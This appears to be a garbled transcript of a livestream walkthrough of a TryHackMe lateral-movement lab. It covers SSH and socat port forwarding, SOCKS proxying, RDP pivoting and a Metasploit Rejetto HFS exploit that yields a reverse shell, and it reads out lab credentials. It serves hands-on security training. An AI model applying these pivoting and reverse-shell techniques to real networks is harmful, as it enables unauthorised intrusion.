port forwarding, not listen, local port forwarding. This option requires us to indicate the local socket used by PC1 to receive connections and the remote socket to connect to from the attacker's PC's perspective. Notice that we use the IP address. In the second socket, as from the attacker's PC perspective, that's the host that holds the port 80 to be forwarded. Since we are opening a new port on PC1, we might need to add a firewall rule to allow for incoming connections with dir in. Admin privs are needed for this. Okay. Once your tunnel is set up, any user pointing their browsers to PC1, that's a victim user, at that IP and see the website published, like our Python shell or Python web service, by the attacker's machine. Port forwarding with SOCAT. In situations where SSH is not available, SOCAT can be used to perform similar functionality. While not as flexible as SSH, SOCAT allows you to forward ports in a much simpler way. One of the disadvantages of using SOCAT is that we need to transfer it to the pivot host, PC1 in our current example, making it more detectable than SSH, but it might be worth a try where no other option is available. The basic syntax to perform port forwarding using SOCAT is much simpler. I like simple. If we want to open port 1234 on the host and forward any connection we receive there to port 4321 on host, you would have the following command. Okay, so SOCAT TCP4 listen, fork TCP4 4321. I see. The fork option allows SOCAT to fork a new process for each connection received, making it possible to handle multiple connections without closing. If you don't include it, SOCAT will close when the first connection made is finished. Coming back to our example, if we wanted to access port 3389 on the server using PC1 as a pivot, as we did with SSH remote port forwarding, we could use the following command. SOCAT TCP listen our port, fork TCP, and then thing. Note that SOCAT can't forward the connection directly to the attacker's machine as SSH, but will open a port on PC1 that the attacker's machine can then connect to. So we open that port and then we connect. Jeez, yawning. As usual, since a port is being opened on the pivot host, we need to create a firewall rule to allow any connections to that port. Okay. If, on the other hand, we'd like to expose port 80 from the attacker's machine so it's reachable by the server, we only need to adjust the command a bit. As a result, PC1 will spawn port 80 and listen for connections to be forwarded to port 80 on the attacker's machine. So that's like if we're hosting a web server here and we want to use PC1 as our pivot. 5 minutes left. Jump back over here. Dynamic port forwarding sucks. While single port forwarding works quite well for tasks that require access to specific sockets, there are times when we might need to run scans against many ports of a host, or even many ports across many machines, all through a pivot host. In those cases, dynamic port forwarding allows us to pivot through a host and establish several connections to any IP address or port we want by using a SOCKS proxy. This is starting to sound like throwback now. This is what we did in throwback. Since we don't want to rely on an SSH server existing on the Windows machine in our target network, we will normally use the SSH client. Okay, this music's too loud in my ears. 1 second, y'all. They like changed up the music a little bit. That snare. Still too loud. Hold up. Okay, that's better. Okay, since we don't want to rely on SSH server, blah, blah. SSH tunnel user -R 9050-N. In this case, the SSH server will start a SOCKS proxy on port 9050 and forward any connection requests through the SSH tunnel where they are finally proxied by the SSH client. Okay. Trying to get that straight in my head. The most interesting part is that we can easily use any of our tools through the SOCKS proxy by using proxy chains. Hey, now it sounds really similar. To do so, we first need to make sure that proxy chain is correctly configured to point any connection to the same port used by SSH for the SOCKS proxy server. The proxy chains config file can be found at etc proxy chains on your attack box. Also, I believe that's what is It might be slightly different in Cali. We'll find it though. If we scroll down to the end of the config file, we should see a line that indicates the port in use for SOCKS proxying. The default port is 9050, but any port will work as long as it matches the one we use when establishing the SSH tunnel. If we now want to execute any command to the proxy, we use proxy chains, which is exactly what we did in Throwback the few times it worked. Note that some software like Mmap might not work well with SOCKS in some circumstances and might show alter results, so your mileage might vary. Or if you're on the Throwback network, it'll just break. Let's get to work. Let's do it. Since you will be doing SSH connections from the lab network back to your attacker machine using the tunnel user for this task, we encourage you to use the attack box or VM instead of your actual machine. That's a good idea. Instructions have been given on creating a user that won't allow running commands or transferring files, so be sure to follow them as provided. It's also recommended to create a strong password for tunnel user and make sure it's unique and discardable password, not your actual password in this or any other platform. Okay, to complete this exercise, you will need to connect to THM Jump. We didn't actually connect yet. Assigned to you in task 1. Oh, way back in task 1. Who was that? There they are. Jenna Field, maybe? Click on the link, your credentials. Once you have them, connect to it. So let's try it with these credentials we got before when we first started this. So Jenna.field at thmjump2.za.tryhackme.com. Income 1982. Hey, it worked. Sweet. Our first objective will be connect via RDP to that web server. If we try to connect directly from our attacker machine, we will find that port 3389 has been filtered. And let's just go ahead and see what the error message looks like, shall we? I don't even remember the syntax for that. Let's do Remina, just because I know Remina a little better. Do I not have it installed? Stupid. That's right. This is I broke my Kali Linux box, so I would have to reinstall this. Oh, it's gonna take a while. We're not gonna do that. It's because I have my DNS set to the domain controller, so it tries to find it through that first. So let me just scroll up and see what that syntax was for X-Free RDP real quick. Here it is. So if we try X-Free RDP, nope, that's the tunnel. So like in the previous task, jeez, maybe I should just Google it. Here we go. X-Free RDP-V, and we want to connect to, well, I'm going to grab this. Jeez, that made me jump. We're going to keep moving, y'all. If you want a 5-minute break, go ahead and take it. I'm not going to take one just because it's getting close to midnight. If I just type this in like that. I know it's not going to work. Oh, shoot. Freaking A. There. That's all I wanted. So if we do X-Free RDP/V and then whatever that is called. Oh my goodness. Gosh, so small. Let's do the IP 10.200.80.201/use Jenna.fields, I think. I know I'm doing a lot of work just to prove that it doesn't work, but just want to see what the actual error message is going to tell us. Jenna.field, I see. Jenna.field. And then /P for our password income 1982. And while that does that, let's get back to our port forwarding. Okay, let's get to work. Okay, so error connection failed to connect because we're being blocked by the firewall, right? That's why we have to set up this port forwarding stuff. Oh, I went too far. Let's get to work. Blah, blah, blah. So we SSH'd over here as Jenna Fields. And we're going to use SOCAT, it would appear. So we're going to use SOCAT. Why does it do that? Does it look so weird? SOCAT's a directory. There we go. All right, we're going to use SOCAT. We'll forward the RDP port to make it available on THM Jump. Oh, and we also need to create our account, remember? Yeah, I remember. So let's create our super secure account while I'm live on stream. That's a good idea. Yeah, I can go ahead and hack my Kali Linux box. I don't care. User tunnel user -m-d home tunnel user -s bin true password. Here's what we'll do. Well, you'll probably see me type the password anyways. I'll just delete this as soon as the stream's done. I don't think it really matters. Looks like the password is going to be tunnel user. Oops. Wait, what did I do wrong here? User add tunnel user -m-d home. Well, I spelled tunnel user wrong. -is ben true. What did I do wrong? I just screwing it up? No, I'm not. User add, blah, blah, blah. Yeah, it's a pretty simple thing. User add. So if I user add test user. Okay, so I added test user there. Stop. Oh, I think I need to specify the options first. These options might just have to go ahead of this one, maybe. User add -m-d, maybe. Tunnel user. Invalid home directory. I feel like it's getting late and I'm missing something super obvious. I'm just about to create a regular freaking user. Can I just do that? Right? Is there any reason I can't? So we need a home directory though, right? To create a user with the name test user and that too without a home directory. To create a user with a comment with a change login shell. So that's what it's trying to do with that bin true. Okay. We're going to kind of work our way through this. So you'd specify the options first, though. Very secure. Okay, don't know if that's gonna work, but we're gonna try it. Let's go ahead and scroll down. We are going to use SOCAT, it said. Just go back to the instructions here, see if there's anything else I missed. Okay, SOCAT. To do so, we run SOCAT with the following parameters. Okay. SOCAT.exe, TCP4, listen. Do they mean 1389? Guess it does. That port doesn't matter if I remember right, so we'll just do 133089. Fork TCP4 thmiis.za.tryhackme.com 3389. Oh, we can't use port 3389 for our listener since it's already being used in THM Jump 2 for its own RDP service. Feel free to change the listener port. Was I supposed to do an RDP service? No. Feel free to change the listener port to a different number to avoid clashing with other students. We should probably do that. Gosh dang it. Broke it. We are going to copy it this time just because I don't feel like retyping that. My goodness. Wow. Do it this way then. Well, let's do that. Okay. I hit enter. Was something supposed to happen? No, because it sets it up. It probably just stays like this, right? Once the listener has been set up, you should be able to connect to it via RDP from your attacker machine by pivoting through your SOCAT listener. Oh, we're using a different user right there. So if we go to here, xfree RDP v thm jump 2.za.tryhackme.com. We use 1339 if I remember right there, -u t1 thomas.more/p for password my pazzw3rd 2020. Shoot. Did I just type the password wrong? Let's just copy this. Because it seemed that it got to the point, like it got past the firewall. Maybe I just typed it wrong. Hey, very cool. And you guys saw, we tested it and it didn't work, right? THM beyond site, there's our flag. Control Shift C should copy it. Where do I put the flag at? Okay, scroll back up. Tunneling complex exploits. The THM DC server is running a vulnerable version of Regetta HFS. The problem we face is that firewall rules restrict access to the vulnerable port, so it can only be viewed from THM Jump 2. Furthermore, outbound connections from THM DC are only allowed machines in its local network, making it impossible to receive a reverse shell directly to our attacker's machine. To make things worse, the Rigetto HFS exploit requires the attacker to host an HTTP server to trigger the final payload, but since no outbound connections are allowed to the attacker's machine, we would need to find a way to host a web server in one of the other machines in the same network, which is not at all convenient. We can use port forwarding to overcome all these problems. First, let's take a look at how the exploit works. First, again, it will connect to the HFS port and Metasploit. So I'm just going to glance at this first. We have our attacker PC. We have HTTP reverse shell trigger exploit to that R port, request payload, send reverse shell to attacker. I see. This second connection will be made against the attacker's machine on service port, where a web server will deliver the final payload. Finally, the attacker's payload will execute and send back a reverse shell. With this in mind, we could use SSH to forward some ports from the attacker's machine to THM jump 2, server port for the web server, and L port to receive the reverse shell, and pivot through THM jump 2 to reach R port on THM DC. I'm going to close this out. I don't think we need that anymore. We would need to do 3 port forwards in both directions so that all the exploits interactions can be proxied through THM jump 2. That sounds confusing. Rigetto HFS will be listening on port 80 on the domain controller, so we need to tunnel that port back to our attacker's machine through THM jump 2 using remote port forwarding. Since the attack box is port 80 occupied with another service, we'll need to link port 80 and THM DC with some port not currently in use by the attack box. Wow. Let's use port 888. When running SSH and THM jump 2 to forward this port, we would have to add that to our command. For server port and L port, let's choose 2 random ports at will. Okay, for demonstrative purposes, we'll set that and that, but be sure to use different ports as the lab is shared with other students. So if 2 of you choose the same ports and trying to forward them, you'll get an error stating that such a port is already used on THM jump 2. To forward such ports from our attacker machine to THM jump, we will use local port forward by adding that and that to our SSH command. Oh my goodness. Putting the whole command together, we'd end up with the following. Okay. If you are using attack box and have joined other network rooms before, be sure to select the IP address assigned to the tunnel interface using lateral movement and pivoting as your attacker IP, or else your reverse shell connections won't work properly. For your convenience, the interface attached to this network is called lateral movement, so you should be able to get the right IP by running that. Once all port forwards are in place, we can start Metasploit and configure the exploit so the required ports match. Oh my goodness, this is this is complex. We can end this. And let's just try to walk through this. So if we SSH tunnel user, and that's the user we created, at our attacker IP, which is that. At our attacker IP -R, it looks like we're going to use port 8888. Something's broken right now with my shell. Oh well, we'll see if it works. thmdc.za.tryhackme.com, port 80 L asterisk this 6666. We're almost the devil. 127-0-0-1 6666 L asterisk 7777 127-0.0.1 77777-N. We need to configure SSH on our host. Just trying to remember the syntax. Is it just, do we just start the service? Might have to configure our SSHD config. Let's look at that. Just looking through this. To disable tunnel clear pass-throughs, change the node to here. These are all commented out. I mean, maybe just the default will work. That'll matter. It's a service. I don't remember my password. Was it tunnel user 123? Frick! What was the password? Maybe I could just reset it quick. It's just user add and then you set the password, right? I'm pretty sure. Oh, just password. We want to change it for a user though. We'll just call it tunnel 123. Tunnel 123. Did it work? I think so. I think we have it set up. I don't know. I don't know if we did. I sure hope so. Let's try this. Come on, Metasploit. It's getting late, y'all. Might have to do a part 3 for this room. I mean, we probably would have been done if we didn't take our time to do pass the hash, pass the ticket, and pass the key, but like I said, the goal is to learn, not rush through it. Starting the Metasploit Framework Council. Can you start this a little bit faster, Metasploit? Like, dang. Thank you. Use Regetta HFS exec. Wow, this is really slow. Options. Okay. We are going to go ahead and set payload Windows shell reverse TCP. Set our listening host. Oh yeah, because it would be the jump box. Okay, this is confusing me for a second. THM jump2za.tryhackme.com. Set reverse listener bind address 127.0.0.1. Set L port. They said to do a different one, so we'll do 1337. Try to remember that. Set server host 127.0.0.1. Set server port. Are we supposed to change that one too? I don't remember. Maybe no one else is on the network or it'll break. We'll know if it doesn't work. Okay. So this is unpacking it. I already know most of this. Blah, blah. It's embedded on the payload. L host. We need to force the payload to connect back to THM jump 2. Our exploit must also run a web server to host. We use server host to indicate the listening address, which in this case is that. The R host is set to point to that. SSH tunnel will forward the request to THMDC to the SSH tunnel. R port is set to 8080 as any connection set to that port on the attacker machine will be forwarded to port 80. After launching the exploit, you'll receive a flag. I bet I did something wrong. Is it really going to work the first try? I will be in awe if it does. Usually when I have that many things I have to type, I at least break something in the process. Shoot! What did I do wrong? Let's try again. What am I missing? Set payload, set lhost. I'm saying copy and paste these. Maybe I typed something wrong. We'll even use the L port they tell us not to use. Hey, I must have typed something wrong the first time. Okay, what does the flag obtain using that on THMDC? Boom, we are going to finish this room tonight, y'all. Right on time. What a good room. That was fun. In this room, we have discussed the many ways an attacker can move around a network once they have a set of valid creds. From an attacker's perspective, having as many different techniques as possible to perform lateral movement will always be helpful, as different networks will have various restrictions in place that may or may not block some of the methods. While we have presented the most common techniques in use, remember that anything that allows you to move from one host to another is lateral movement. Depending on the specifics of each network, other paths could be viable. Should you be interested in more tools and techniques, the following resources are available. Cool. We've completed the room. You are my only friends, so I'm sharing it with you guys. We did it. And what we are going to do, just back out here. How am I doing on my rank? Let's see. Oh, I'm almost to level 13. Look how close I am. Let me open up OBS real quick. Share it to my face cam. So hey y'all, thank you guys for joining, whether it's on Twitch or YouTube after the fact. Tomorrow night is going to be a special stream, so we will be going live I think at 10 p.m. Central Time, so do the time conversion for you, and it'll really be Amoeba Man, I think, for most of the stream. He's going to teach us how to use I'm blanking on it. It starts with a V. Can't think of what it's called, to set up an Active Directory lab, and he's going to kind of show us how he has set up many of these rooms. So you'll notice Amoeba Man released a lot of these. Even this room was built on the network he himself built for TryHackMe. So he's going to be on our stream tomorrow night, walking us through how to set up our own AD lab and get things configured. Vagrant, thank you, Nate. Yeah, Vagrant. He's going to show us how to do that. So tomorrow, 10 p.m. Central Time, come back here on Twitch. I'll post it on YouTube after the fact, but he is going to do that walkthrough for us. So that being said, it is midnight. That was like, you couldn't even get better timing than that. Usually I try to be done by midnight. So thanks for watching. Thanks for hanging out. I will catch you guys tomorrow night as we continue to learn and work alongside of each other. Peace out. Have a good night.